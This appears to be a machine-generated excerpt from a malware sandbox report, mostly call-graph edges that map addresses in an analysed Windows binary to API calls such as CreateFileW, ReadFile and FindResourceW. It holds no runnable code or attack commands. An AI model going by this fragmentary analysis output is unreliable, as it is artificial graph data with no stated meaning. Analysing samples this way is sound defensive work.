39170->38535 39171->38558 39173 409cf9 GetVersionExW 39172->39173 39174 409d0a 39172->39174 39173->39174 39174->38565 39174->38570 39175->38571 39176->38575 39177->38577 39178->38622 39180 40bba5 39179->39180 39295 40cc26 39180->39295 39183 40bd4b 39316 40cc0c 39183->39316 39188 40b2cc 27 API calls 39189 40bbef 39188->39189 39323 40ccf0 _wcsicmp 39189->39323 39191 40bbf5 39191->39183 39324 40ccb4 6 API calls 39191->39324 39193 40bc26 39194 40cf04 17 API calls 39193->39194 39195 40bc2e 39194->39195 39196 40bd43 39195->39196 39197 40b2cc 27 API calls 39195->39197 39198 40cc0c 4 API calls 39196->39198 39199 40bc40 39197->39199 39198->39183 39325 40ccf0 _wcsicmp 39199->39325 39201 40bc46 39201->39196 39202 40bc61 memset memset WideCharToMultiByte 39201->39202 39326 40103c strlen 39202->39326 39204 40bcc0 39205 40b273 27 API calls 39204->39205 39206 40bcd0 memcmp 39205->39206 39206->39196 39207 40bce2 39206->39207 39208 404423 38 API calls 39207->39208 39209 40bd10 39208->39209 39209->39196 39210 40bd3a LocalFree 39209->39210 39211 40bd1f memcpy 39209->39211 39210->39196 39211->39210 39212->38637 39386 4438b5 39213->39386 39215 44444c 39220 40b879 39215->39220 39400 415a6d 39215->39400 39218 44469e 39218->39220 39451 443d90 111 API calls 39218->39451 39219 444486 39221 4444b9 memcpy 39219->39221 39247 4444a4 39219->39247 39220->38640 39220->38643 39404 415258 39221->39404 39224 444524 39225 444541 39224->39225 39226 44452a 39224->39226 39407 444316 39225->39407 39441 416935 16 API calls 39226->39441 39230 444316 18 API calls 39231 444563 39230->39231 39232 444316 18 API calls 39231->39232 39233 44456f 39232->39233 39234 444316 18 API calls 39233->39234 39235 44457f 39234->39235 39235->39247 39421 432d4e 39235->39421 39238 444316 18 API calls 39239 4445b0 39238->39239 39425 41eed2 39239->39425 39241 4445cf 39242 4445d6 39241->39242 39243 4445ee 39241->39243 39442 416935 16 API calls 39242->39442 39443 43302c memset 39243->39443 39246 4445fa 39444 43302c memset 39246->39444 39450 4442e6 11 API calls 39247->39450 39249 444609 39249->39247 39445 416935 16 API calls 39249->39445 39251 444646 39446 434d4b 17 API calls 39251->39446 39253 44464d 39447 437655 16 API calls 39253->39447 39255 444653 39448 4442e6 11 API calls 39255->39448 39257 44465d 39257->39247 39449 416935 16 API calls 39257->39449 39489 438460 39259->39489 39261 40b8a4 39261->38649 39265 4251c4 39261->39265 39263 409a74 GetTempFileNameW 39262->39263 39264 409a66 GetWindowsDirectoryW 39262->39264 39263->38635 39264->39263 39586 424f07 11 API calls 39265->39586 39267 4251e4 39268 4251f7 39267->39268 39269 4251e8 39267->39269 39588 4250f8 39268->39588 39587 4446ea 11 API calls 39269->39587 39274 425249 39280 425287 39274->39280 39598 424ff0 13 API calls 39274->39598 39275 4251f2 39275->38674 39278 4250f8 127 API calls 39279 425209 39278->39279 39279->39274 39279->39278 39279->39280 39596 4384e9 135 API calls 39279->39596 39597 424f74 124 API calls 39279->39597 39600 415c7d 16 API calls 39280->39600 39281 425266 39281->39280 39599 415be9 memcpy 39281->39599 39283->38674 39284->38674 39285->38674 39286->38674 39287->38674 39288->38674 39289->38674 39290->38674 39291->38674 39292->38649 39293->38640 39294->38671 39327 4096c3 CreateFileW 39295->39327 39297 40cc34 39298 40cc3d GetFileSize 39297->39298 39299 40bbca 39297->39299 39300 40afcf 2 API calls 39298->39300 39299->39183 39307 40cf04 39299->39307 39301 40cc64 39300->39301 39328 40a2ef ReadFile 39301->39328 39303 40cc71 39329 40ab4a MultiByteToWideChar 39303->39329 39305 40cc95 CloseHandle 39306 40b04b ??3@YAXPAX 39305->39306 39306->39299 39308 40b633 free 39307->39308 39309 40cf14 39308->39309 39335 40b1ab free free 39309->39335 39311 40bbdd 39311->39183 39311->39188 39312 40cf1b 39312->39311 39313 40cfef 39312->39313 39336 40cd4b 39312->39336 39315 40cd4b 14 API calls 39313->39315 39315->39311 39317 40b633 free 39316->39317 39318 40cc15 39317->39318 39319 40aa04 free 39318->39319 39320 40cc1d 39319->39320 39385 40b1ab free free 39320->39385 39322 40b7d4 memset CreateFileW 39322->38628 39322->38629 39323->39191 39324->39193 39325->39201 39326->39204 39327->39297 39328->39303 39330 40ab93 39329->39330 39331 40ab6b 39329->39331 39330->39305 39332 40a9ce 4 API calls 39331->39332 39333 40ab74 39332->39333 39334 40ab7c MultiByteToWideChar 39333->39334 39334->39330 39335->39312 39337 40cd7b 39336->39337 39370 40aa29 39337->39370 39340 40cef5 39341 40aa04 free 39340->39341 39342 40cefd 39341->39342 39342->39312 39343 40aa29 6 API calls 39344 40ce1d 39343->39344 39345 40aa29 6 API calls 39344->39345 39346 40ce3e 39345->39346 39347 40ce6a 39346->39347 39378 40abb7 wcslen memmove 39346->39378 39348 40ce9f 39347->39348 39381 40abb7 wcslen memmove 39347->39381 39351 40a8d0 7 API calls 39348->39351 39354 40ceb5 39351->39354 39352 40ce56 39379 40aa71 wcslen 39352->39379 39353 40ce8b 39382 40aa71 wcslen 39353->39382 39358 40a8d0 7 API calls 39354->39358 39357 40ce5e 39380 40abb7 wcslen memmove 39357->39380 39361 40cecb 39358->39361 39359 40ce93 39383 40abb7 wcslen memmove 39359->39383 39384 40d00b malloc memcpy free free 39361->39384 39364 40cedd 39365 40aa04 free 39364->39365 39366 40cee5 39365->39366 39367 40aa04 free 39366->39367 39368 40ceed 39367->39368 39369 40aa04 free 39368->39369 39369->39340 39371 40aa33 39370->39371 39372 40aa63 39370->39372 39373 40aa44 39371->39373 39374 40aa38 wcslen 39371->39374 39372->39340 39372->39343 39375 40a9ce malloc memcpy free free 39373->39375 39374->39373 39376 40aa4d 39375->39376 39376->39372 39377 40aa51 memcpy 39376->39377 39377->39372 39378->39352 39379->39357 39380->39347 39381->39353 39382->39359 39383->39348 39384->39364 39385->39322 39387 4438d0 39386->39387 39397 4438c9 39386->39397 39452 415378 memcpy memcpy 39387->39452 39397->39215 39401 415a77 39400->39401 39402 415a8d 39401->39402 39403 415a7e memset 39401->39403 39402->39219 39403->39402 39405 4438b5 11 API calls 39404->39405 39406 41525d 39405->39406 39406->39224 39408 444328 39407->39408 39409 444423 39408->39409 39410 44434e 39408->39410 39455 4446ea 11 API calls 39409->39455 39412 432d4e 3 API calls 39410->39412 39413 44435a 39412->39413 39416 444375 39413->39416 39420 44438b 39413->39420 39414 432d4e 3 API calls 39415 4443ec 39414->39415 39418 444381 39415->39418 39454 416935 16 API calls 39415->39454 39453 416935 16 API calls 39416->39453 39418->39230 39420->39414 39422 432d58 39421->39422 39424 432d65 39421->39424 39456 432cc4 memset memset memcpy 39422->39456 39424->39238 39426 41eee2 39425->39426 39427 415a6d memset 39426->39427 39428 41ef23 39427->39428 39429 415a6d memset 39428->39429 39438 41ef2d 39428->39438 39430 41ef42 39429->39430 39434 41ef49 39430->39434 39457 41b7d9 39430->39457 39432 41ef66 39433 41ef74 memset 39432->39433 39432->39434 39435 41ef91 39433->39435 39436 41ef9e 39433->39436 39434->39438 39475 41b321 101 API calls 39434->39475 39471 41519d 39435->39471 39436->39434 39474 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39436->39474 39438->39241 39441->39247 39442->39247 39443->39246 39444->39249 39445->39251 39446->39253 39447->39255 39448->39257 39449->39247 39450->39218 39451->39220 39453->39418 39454->39418 39455->39418 39456->39424 39459 41b812 39457->39459 39458 415a6d memset 39460 41b8c2 39458->39460 39463 41b849 39459->39463 39467 41b884 39459->39467 39476 444706 11 API calls 39459->39476 39461 41b902 memcpy memcpy memcpy memcpy memcpy 39460->39461 39462 41b980 39460->39462 39460->39463 39461->39462 39470 41b9ad 39462->39470 39477 4151e3 39462->39477 39463->39432 39466 41ba12 39466->39463 39468 41ba32 memset 39466->39468 39467->39458 39467->39463 39468->39463 39470->39463 39480 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39470->39480 39481 4175ed 39471->39481 39474->39434 39475->39438 39476->39467 39479 41837f 55 API calls 39477->39479 39478 4151f9 39478->39470 39479->39478 39480->39466 39482 417570 SetFilePointer GetLastError GetLastError 39481->39482 39483 4175ff 39482->39483 39484 41760a ReadFile 39483->39484 39487 4151b3 39483->39487 39485 417637 39484->39485 39486 417627 GetLastError 39484->39486 39485->39487 39488 41763e memset 39485->39488 39486->39487 39487->39436 39488->39487 39501 41703f 39489->39501 39491 43847a 39492 43848a 39491->39492 39493 43847e 39491->39493 39508 438270 39492->39508 39538 4446ea 11 API calls 39493->39538 39497 438488 39497->39261 39499 4384bb 39500 438270 134 API calls 39499->39500 39500->39497 39502 417044 39501->39502 39503 41705c 39501->39503 39507 417055 39502->39507 39540 416760 11 API calls 39502->39540 39504 417075 39503->39504 39541 41707a 11 API calls 39503->39541 39504->39491 39507->39491 39542 415a91 39508->39542 39510 43828d 39511 438297 39510->39511 39512 438341 39510->39512 39514 4382d6 39510->39514 39585 415c7d 16 API calls 39511->39585 39546 44358f 39512->39546 39517 4382fb 39514->39517 39518 4382db 39514->39518 39516 438458 39516->39497 39539 424f26 123 API calls 39516->39539 39579 415c23 memcpy 39517->39579 39577 416935 16 API calls 39518->39577 39521 438305 39524 44358f 19 API calls 39521->39524 39527 438318 39521->39527 39522 4382e9 39578 415c7d 16 API calls 39522->39578 39524->39527 39525 438373 39530 438383 39525->39530 39580 4300e8 memset memset memcpy 39525->39580 39527->39525 39572 43819e 39527->39572 39529 4383cd 39535 4383f5 39529->39535 39582 42453e 123 API calls 39529->39582 39530->39529 39581 415c23 memcpy 39530->39581 39532 438404 39583 416935 16 API calls 39532->39583 39533 43841c 39584 416935 16 API calls 39533->39584 39535->39532 39535->39533 39538->39497 39539->39499 39540->39507 39541->39502 39543 415a9d 39542->39543 39544 415ab3 39543->39544 39545 415aa4 memset 39543->39545 39544->39510 39545->39544 39550 4435be 39546->39550 39547 443758 39549 443775 39547->39549 39552 441409 memset 39547->39552 39548 443676 39548->39547 39551 443737 39548->39551 39553 442ff8 19 API calls 39548->39553 39557 4437be 39549->39557 39566 415c56 11 API calls 39549->39566 39550->39548 39555 442ff8 19 API calls 39550->39555 39556 44366c 39550->39556 39558 4436ce 39550->39558 39570 44360c 39550->39570 39554 442ff8 19 API calls 39551->39554 39552->39547 39553->39551 39554->39547 39555->39550 39560 4169a7 11 API calls 39556->39560 39561 416760 11 API calls 39557->39561 39562 4437de 39557->39562 39559 4165ff 11 API calls 39558->39559 39559->39548 39560->39548 39561->39562 39563 42463b memset memcpy 39562->39563 39565 443801 39562->39565 39563->39565 39564 443826 39568 43bd08 memset 39564->39568 39565->39564 39567 43024d memset 39565->39567 39566->39557 39567->39564 39569 443837 39568->39569 39569->39570 39571 43024d memset 39569->39571 39570->39527 39571->39569 39573 438246 39572->39573 39575 4381ba 39572->39575 39573->39525 39574 41f432 110 API calls 39574->39575 39575->39573 39575->39574 39576 41f638 104 API calls 39575->39576 39576->39575 39577->39522 39578->39511 39579->39521 39580->39530 39581->39529 39582->39535 39583->39511 39584->39511 39585->39516 39586->39267 39587->39275 39589 425108 39588->39589 39595 42510d 39588->39595 39633 424f74 124 API calls 39589->39633 39592 425115 39592->39279 39593 42516e 39634 415c7d 16 API calls 39593->39634 39595->39592 39601 42569b 39595->39601 39596->39279 39597->39279 39598->39281 39599->39280 39600->39275 39602 4256f1 39601->39602 39629 4259c2 39601->39629 39608 4259da 39602->39608 39612 429a4d 39602->39612 39615 422aeb memset memcpy memcpy 39602->39615 39618 4260a1 39602->39618 39627 429ac1 39602->39627 39602->39629 39632 425a38 39602->39632 39635 4227f0 memset memcpy 39602->39635 39636 422b84 15 API calls 39602->39636 39637 422b5d memset memcpy memcpy 39602->39637 39638 422640 13 API calls 39602->39638 39640 4241fc 11 API calls 39602->39640 39641 42413a 90 API calls 39602->39641 39607 4260dd 39646 424251 120 API calls 39607->39646 39645 416760 11 API calls 39608->39645 39613 429a66 39612->39613 39614 429a9b 39612->39614 39647 415c56 11 API calls 39613->39647 39619 429a96 39614->39619 39649 416760 11 API calls 39614->39649 39615->39602 39644 415c56 11 API calls 39618->39644 39650 424251 120 API calls 39619->39650 39621 429a7a 39648 416760 11 API calls 39621->39648 39628 425ad6 39627->39628 39651 415c56 11 API calls 39627->39651 39628->39593 39629->39628 39639 415c56 11 API calls 39629->39639 39632->39629 39642 422640 13 API calls 39632->39642 39643 4226e0 12 API calls 39632->39643 39633->39595 39634->39592 39635->39602 39636->39602 39637->39602 39638->39602 39639->39608 39640->39602 39641->39602 39642->39632 39643->39632 39644->39608 39645->39607 39646->39628 39647->39621 39648->39619 39649->39619 39650->39627 39651->39608 39652->38709 39653->38717 39654 44dea5 39655 44deb5 FreeLibrary 39654->39655 39656 44dec3 39654->39656 39655->39656 39657 4147f3 39660 414561 39657->39660 39659 414813 39661 41456d 39660->39661 39662 41457f GetPrivateProfileIntW 39660->39662 39665 4143f1 memset _itow WritePrivateProfileStringW 39661->39665 39662->39659 39664 41457a 39664->39659 39665->39664 39666 44def7 39667 44df07 39666->39667 39668 44df00 ??3@YAXPAX 39666->39668 39669 44df17 39667->39669 39670 44df10 ??3@YAXPAX 39667->39670 39668->39667 39671 44df27 39669->39671 39672 44df20 ??3@YAXPAX 39669->39672 39670->39669 39673 44df37 39671->39673 39674 44df30 ??3@YAXPAX 39671->39674 39672->39671 39674->39673 39675 4287c1 39676 4287d2 39675->39676 39677 429ac1 39675->39677 39679 428818 39676->39679 39680 42881f 39676->39680 39690 425711 39676->39690 39688 425ad6 39677->39688 39745 415c56 11 API calls 39677->39745 39712 42013a 39679->39712 39740 420244 97 API calls 39680->39740 39682 4260dd 39739 424251 120 API calls 39682->39739 39686 4259da 39738 416760 11 API calls 39686->39738 39690->39677 39690->39686 39693 429a4d 39690->39693 39696 422aeb memset memcpy memcpy 39690->39696 39699 4260a1 39690->39699 39708 4259c2 39690->39708 39711 425a38 39690->39711 39728 4227f0 memset memcpy 39690->39728 39729 422b84 15 API calls 39690->39729 39730 422b5d memset memcpy memcpy 39690->39730 39731 422640 13 API calls 39690->39731 39733 4241fc 11 API calls 39690->39733 39734 42413a 90 API calls 39690->39734 39694 429a66 39693->39694 39695 429a9b 39693->39695 39741 415c56 11 API calls 39694->39741 39707 429a96 39695->39707 39743 416760 11 API calls 39695->39743 39696->39690 39737 415c56 11 API calls 39699->39737 39701 429a7a 39742 416760 11 API calls 39701->39742 39744 424251 120 API calls 39707->39744 39708->39688 39732 415c56 11 API calls 39708->39732 39711->39708 39735 422640 13 API calls 39711->39735 39736 4226e0 12 API calls 39711->39736 39713 42014c 39712->39713 39716 420151 39712->39716 39755 41e466 97 API calls 39713->39755 39715 420162 39715->39690 39716->39715 39717 4201b3 39716->39717 39718 420229 39716->39718 39719 4201b8 39717->39719 39720 4201dc 39717->39720 39718->39715 39721 41fd5e 86 API calls 39718->39721 39746 41fbdb 39719->39746 39720->39715 39724 4201ff 39720->39724 39752 41fc4c 39720->39752 39721->39715 39724->39715 39726 42013a 97 API calls 39724->39726 39726->39715 39728->39690 39729->39690 39730->39690 39731->39690 39732->39686 39733->39690 39734->39690 39735->39711 39736->39711 39737->39686 39738->39682 39739->39688 39740->39690 39741->39701 39742->39707 39743->39707 39744->39677 39745->39686 39747 41fbf8 39746->39747 39750 41fbf1 39746->39750 39760 41ee26 39747->39760 39751 41fc39 39750->39751 39770 4446ce 11 API calls 39750->39770 39751->39715 39756 41fd5e 39751->39756 39753 41ee6b 86 API calls 39752->39753 39754 41fc5d 39753->39754 39754->39720 39755->39716 39758 41fd65 39756->39758 39757 41fdab 39757->39715 39758->39757 39759 41fbdb 86 API calls 39758->39759 39759->39758 39761 41ee41 39760->39761 39762 41ee32 39760->39762 39771 41edad 39761->39771 39774 4446ce 11 API calls 39762->39774 39765 41ee3c 39765->39750 39768 41ee58 39768->39765 39776 41ee6b 39768->39776 39770->39751 39780 41be52 39771->39780 39774->39765 39775 41eb85 11 API calls 39775->39768 39777 41ee70 39776->39777 39778 41ee78 39776->39778 39818 41bf99 86 API calls 39777->39818 39778->39765 39781 41be6f 39780->39781 39782 41be5f 39780->39782 39787 41be8c 39781->39787 39812 418c63 memset memset 39781->39812 39811 4446ce 11 API calls 39782->39811 39784 41be69 39784->39765 39784->39775 39787->39784 39788 41bf3a 39787->39788 39789 41bed1 39787->39789 39792 41bee7 39787->39792 39815 4446ce 11 API calls 39788->39815 39791 41bef0 39789->39791 39793 41bee2 39789->39793 39791->39792 39797 41bf01 39791->39797 39792->39784 39816 41a453 86 API calls 39792->39816 39801 41ac13 39793->39801 39794 41bf24 memset 39794->39784 39796 41bf14 39814 41a223 memset memcpy memset 39796->39814 39797->39794 39797->39796 39813 418a6d memset memcpy memset 39797->39813 39800 41bf20 39800->39794 39802 41ac52 39801->39802 39803 41ac3f memset 39801->39803 39805 41ac6a 39802->39805 39817 41dc14 19 API calls 39802->39817 39808 41acd9 39803->39808 39806 41aca1 39805->39806 39807 41519d 6 API calls 39805->39807 39806->39808 39809 41acc0 memset 39806->39809 39810 41accd memcpy 39806->39810 39807->39806 39808->39792 39809->39808 39810->39808 39811->39784 39812->39787 39813->39796 39814->39800 39815->39792 39817->39805 39818->39778 39819 417bc5 39820 417c61 39819->39820 39821 417bda 39819->39821 39821->39820 39822 417bf6 UnmapViewOfFile CloseHandle 39821->39822 39825 417c2c 39821->39825 39826 4175b7 39821->39826 39822->39821 39822->39822 39825->39821 39831 41851e 20 API calls 39825->39831 39827 4175d6 CloseHandle 39826->39827 39828 4175c8 39827->39828 39829 4175df 39827->39829 39828->39829 39830 4175ce Sleep 39828->39830 39829->39821 39830->39827 39831->39825 39832 4148b6 FindResourceW 39833 4148cf SizeofResource 39832->39833 39836 4148f9 39832->39836 39834 4148e0 LoadResource 39833->39834 39833->39836 39835 4148ee LockResource 39834->39835 39834->39836 39835->39836 39837 441b3f 39847 43a9f6 39837->39847 39839 441b61 40020 4386af memset 39839->40020 39841 44189a 39842 442bd4 39841->39842 39843 4418e2 39841->39843 39844 4418ea 39842->39844 40022 441409 memset 39842->40022 39843->39844 40021 4414a9 12 API calls 39843->40021 39848 43aa20 39847->39848 39849 43aadf 39847->39849 39848->39849 39850 43aa34 memset 39848->39850 39849->39839 39851 43aa56 39850->39851 39852 43aa4d 39850->39852 40023 43a6e7 39851->40023 40031 42c02e memset 39852->40031 39857 43aad3 40033 4169a7 11 API calls 39857->40033 39858 43aaae 39858->39849 39858->39857 39873 43aae5 39858->39873 39860 43ac18 39862 43ac47 39860->39862 40035 42bbd5 memcpy memcpy memcpy memset memcpy 39860->40035 39863 43aca8 39862->39863 40036 438eed 16 API calls 39862->40036 39867 43acd5 39863->39867 40038 4233ae 11 API calls 39863->40038 39866 43ac87 40037 4233c5 16 API calls 39866->40037 40039 423426 11 API calls 39867->40039 39871 43ace1 40040 439811 163 API calls 39871->40040 39872 43a9f6 161 API calls 39872->39873 39873->39849 39873->39860 39873->39872 40034 439bbb 22 API calls 39873->40034 39875 43acfd 39881 43ad2c 39875->39881 40041 438eed 16 API calls 39875->40041 39877 43ad19 40042 4233c5 16 API calls 39877->40042 39879 43ad58 40043 44081d 163 API calls 39879->40043 39881->39879 39883 43add9 39881->39883 39883->39883 40047 423426 11 API calls 39883->40047 39884 43ae3a memset 39885 43ae73 39884->39885 40048 42e1c0 147 API calls 39885->40048 39886 43adab 40045 438c4e 163 API calls 39886->40045 39888 43ad6c 39888->39849 39888->39886 40044 42370b memset memcpy memset 39888->40044 39890 43ae96 40049 42e1c0 147 API calls 39890->40049 39892 43adcc 40046 440f84 12 API calls 39892->40046 39895 43aea8 39896 43aec1 39895->39896 40050 42e199 147 API calls 39895->40050 39898 43af00 39896->39898 40051 42e1c0 147 API calls 39896->40051 39898->39849 39901 43af1a 39898->39901 39902 43b3d9 39898->39902 40052 438eed 16 API calls 39901->40052 39907 43b3f6 39902->39907 39913 43b4c8 39902->39913 39904 43b60f 39904->39849 40111 4393a5 17 API calls 39904->40111 39905 43af2f 40053 4233c5 16 API calls 39905->40053 40093 432878 12 API calls 39907->40093 39909 43af51 40054 423426 11 API calls 39909->40054 39912 43af7d 40055 423426 11 API calls 39912->40055 39920 43b4f2 39913->39920 40099 42bbd5 memcpy memcpy memcpy memset memcpy 39913->40099 39917 43b529 40101 44081d 163 API calls 39917->40101 39918 43b462 40095 423330 11 API calls 39918->40095 39919 43af94 40056 423330 11 API calls 39919->40056 40100 43a76c 21 API calls 39920->40100 39924 43b47e 39927 43b497 39924->39927 40096 42374a memcpy memset memcpy memcpy memcpy 39924->40096 39925 43b544 39928 43b55c 39925->39928 40102 42c02e memset 39925->40102 39926 43afca 40057 423330 11 API calls 39926->40057 40097 4233ae 11 API calls 39927->40097 40103 43a87a 163 API calls 39928->40103 39933 43b428 39933->39918 40094 432b60 16 API calls 39933->40094 39934 43afdb 40058 4233ae 11 API calls 39934->40058 39936 43b4b1 40098 423399 11 API calls 39936->40098 39938 43b56c 39941 43b58a 39938->39941 40104 423330 11 API calls 39938->40104 39940 43afee 40059 44081d 163 API calls 39940->40059 40105 440f84 12 API calls 39941->40105 39943 43b4c1 40107 42db80 163 API calls 39943->40107 39947 43b592 40106 43a82f 16 API calls 39947->40106 39950 43b5b4 40108 438c4e 163 API calls 39950->40108 39952 43b5cf 40109 42c02e memset 39952->40109 39954 43b005 39954->39849 39959 43b01f 39954->39959 40060 42d836 163 API calls 39954->40060 39955 43b1ef 40070 4233c5 16 API calls 39955->40070 39957 43b212 40071 423330 11 API calls 39957->40071 39959->39955 40068 423330 11 API calls 39959->40068 40069 42d71d 163 API calls 39959->40069 39961 43add4 39961->39904 40110 438f86 16 API calls 39961->40110 39964 43b087 40061 4233ae 11 API calls 39964->40061 39965 43b22a 40072 42ccb5 11 API calls 39965->40072 39968 43b10f 40064 423330 11 API calls 39968->40064 39969 43b23f 40073 4233ae 11 API calls 39969->40073 39971 43b257 40074 4233ae 11 API calls 39971->40074 39975 43b129 40065 4233ae 11 API calls 39975->40065 39976 43b26e 40075 4233ae 11 API calls 39976->40075 39978 43b09a 39978->39968 40062 42cc15 19 API calls 39978->40062 40063 4233ae 11 API calls 39978->40063 39980 43b282 40076 43a87a 163 API calls 39980->40076 39982 43b13c 40066 440f84 12 API calls 39982->40066 39984 43b29d 40077 423330 11 API calls 39984->40077 39987 43b15f 40067 4233ae 11 API calls 39987->40067 39988 43b2af 39990 43b2b8 39988->39990 39991 43b2ce 39988->39991 40078 4233ae 11 API calls 39990->40078 40079 440f84 12 API calls 39991->40079 39994 43b2c9 40081 4233ae 11 API calls 39994->40081 39995 43b2da 40080 42370b memset memcpy memset 39995->40080 39998 43b2f9 40082 423330 11 API calls 39998->40082 40000 43b30b 40083 423330 11 API calls 40000->40083 40002 43b325 40084 423399 11 API calls 40002->40084 40004 43b332 40085 4233ae 11 API calls 40004->40085 40006 43b354 40086 423399 11 API calls 40006->40086 40008 43b364 40087 43a82f 16 API calls 40008->40087 40010 43b370 40088 42db80 163 API calls 40010->40088 40012 43b380 40089 438c4e 163 API calls 40012->40089 40014 43b39e 40090 423399 11 API calls 40014->40090 40016 43b3ae 40091 43a76c 21 API calls 40016->40091 40018 43b3c3 40092 423399 11 API calls 40018->40092 40020->39841 40021->39844 40022->39842 40024 43a6f5 40023->40024 40025 43a765 40023->40025 40024->40025 40112 42a115 40024->40112 40025->39849 40032 4397fd memset 40025->40032 40029 43a73d 40029->40025 40030 42a115 147 API calls 40029->40030 40030->40025 40031->39851 40032->39858 40033->39849 40034->39873 40035->39862 40036->39866 40037->39863 40038->39867 40039->39871 40040->39875 40041->39877 40042->39881 40043->39888 40044->39886 40045->39892 40046->39961 40047->39884 40048->39890 40049->39895 40050->39896 40051->39896 40052->39905 40053->39909 40054->39912 40055->39919 40056->39926 40057->39934 40058->39940 40059->39954 40060->39964 40061->39978 40062->39978 40063->39978 40064->39975 40065->39982 40066->39987 40067->39959 40068->39959 40069->39959 40070->39957 40071->39965 40072->39969 40073->39971 40074->39976 40075->39980 40076->39984 40077->39988 40078->39994 40079->39995 40080->39994 40081->39998 40082->40000 40083->40002 40084->40004 40085->40006 40086->40008 40087->40010 40088->40012 40089->40014 40090->40016 40091->40018 40092->39961 40093->39933 40094->39918 40095->39924 40096->39927 40097->39936 40098->39943 40099->39920 40100->39917 40101->39925 40102->39928 40103->39938 40104->39941 40105->39947 40106->39943 40107->39950 40108->39952 40109->39961 40110->39904 40111->39849 40113 42a175 40112->40113 40115 42a122 40112->40115 40113->40025 40118 42b13b 147 API calls 40113->40118 40115->40113 40116 42a115 147 API calls 40115->40116 40119 43a174 40115->40119 40143 42a0a8 147 API calls 40115->40143 40116->40115 40118->40029 40133 43a196 40119->40133 40134 43a19e 40119->40134 40120 43a306 40120->40133 40157 4388c4 14 API calls 40120->40157 40123 42a115 147 API calls 40123->40134 40124 415a91 memset 40124->40134 40125 43a642 40125->40133 40162 4169a7 11 API calls 40125->40162 40130 43a635 40161 42c02e memset 40130->40161 40133->40115 40134->40120 40134->40123 40134->40124 40134->40133 40144 42ff8c 40134->40144 40152 4165ff 11 API calls 40134->40152 40153 439504 13 API calls 40134->40153 40154 4312d0 147 API calls 40134->40154 40155 42be4c memcpy memcpy memcpy memset memcpy 40134->40155 40156 43a121 11 API calls 40134->40156 40136 42bf4c 14 API calls 40142 43a325 40136->40142 40137 4169a7 11 API calls 40137->40142 40138 42b5b5 memset memcpy 40138->40142 40142->40125 40142->40130 40142->40133 40142->40136 40142->40137 40142->40138 40158 42b63e 14 API calls 40142->40158 40159 4165ff 11 API calls 40142->40159 40160 42bfcf memcpy 40142->40160 40143->40115 40163 43817e 40144->40163 40146 42ff99 40147 42ffe3 40146->40147 40148 42ffd0 40146->40148 40151 42ff9d 40146->40151 40168 4169a7 11 API calls 40147->40168 40167 4169a7 11 API calls 40148->40167 40151->40134 40152->40134 40153->40134 40154->40134 40155->40134 40156->40134 40157->40142 40158->40142 40159->40142 40160->40142 40161->40125 40162->40133 40164 438187 40163->40164 40165 438192 40163->40165 40169 4380f6 40164->40169 40165->40146 40167->40151 40168->40151 40171 43811f 40169->40171 40170 438164 40170->40165 40171->40170 40174 437e5e 40171->40174 40197 4300e8 memset memset memcpy 40171->40197 40198 437d3c 40174->40198 40176 437eb3 40176->40171 40177 437ea9 40177->40176 40183 437f22 40177->40183 40213 41f432 40177->40213 40180 437f06 40224 415c56 11 API calls 40180->40224 40182 437f95 40225 415c56 11 API calls 40182->40225 40184 437f7f 40183->40184 40185 432d4e 3 API calls 40183->40185 40184->40182 40186 43802b 40184->40186 40185->40184 40226 4165ff 11 API calls 40186->40226 40188 437fa3 40188->40176 40230 41f638 104 API calls 40188->40230 40190 438054 40227 437371 138 API calls 40190->40227 40193 43806b 40194 438094 40193->40194 40228 42f50e 138 API calls 40193->40228 40194->40188 40229 4300e8 memset memset memcpy 40194->40229 40197->40171 40199 437d69 40198->40199 40202 437d80 40198->40202 40231 437ccb 11 API calls 40199->40231 40201 437d76 40201->40177 40202->40201 40203 437da3 40202->40203 40204 437d90 40202->40204 40206 438460 134 API calls 40203->40206 40204->40201 40235 437ccb 11 API calls 40204->40235 40209 437dcb 40206->40209 40207 437de8 40234 424f26 123 API calls 40207->40234 40209->40207 40232 444283 13 API calls 40209->40232 40211 437dfc 40233 437ccb 11 API calls 40211->40233 40214 41f54d 40213->40214 40219 41f44f 40213->40219 40216 41f466 40214->40216 40265 41c635 memset memset 40214->40265 40216->40180 40216->40183 40219->40216 40222 41f50b 40219->40222 40236 41f1a5 40219->40236 40261 41c06f memcmp 40219->40261 40262 41f3b1 90 API calls 40219->40262 40263 41f398 86 API calls 40219->40263 40222->40214 40222->40216 40264 41c295 86 API calls 40222->40264 40224->40176 40225->40188 40226->40190 40227->40193 40228->40194 40229->40188 40230->40176 40231->40201 40232->40211 40233->40207 40234->40201 40235->40201 40237 41bc3b 101 API calls 40236->40237 40238 41f1b4 40237->40238 40239 41edad 86 API calls 40238->40239 40244 41f282 40238->40244 40240 41f1cb 40239->40240 40241 41f1f5 memcmp 40240->40241 40242 41f20e 40240->40242 40240->40244 40241->40242 40243 41f21b memcmp 40242->40243 40242->40244 40246 41f23d 40243->40246 40254 41f326 40243->40254 40244->40219 40245 41ee6b 86 API calls 40245->40244 40247 41f28e memcmp 40246->40247 40249 41c8df 56 API calls 40246->40249 40246->40254 40248 41f2a9 40247->40248 40247->40254 40251 41f308 40248->40251 40252 41f2d8 40248->40252 40248->40254 40250 41f269 40249->40250 40250->40254 40255 41f287 40250->40255 40256 41f27a 40250->40256 40251->40254 40259 4446ce 11 API calls 40251->40259 40253 41ee6b 86 API calls 40252->40253 40258 41f2e0 40253->40258 40254->40244 40254->40245 40255->40247 40257 41ee6b 86 API calls 40256->40257 40257->40244 40260 41b1ca memset 40258->40260 40259->40254 40260->40244 40261->40219 40262->40219 40263->40219 40264->40214 40265->40216 40266 41493c EnumResourceNamesW 40267 44660a 40270 4465e4 40267->40270 40269 446613 40271 4465f3 __dllonexit 40270->40271 40272 4465ed _onexit 40270->40272 40271->40269 40272->40271

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
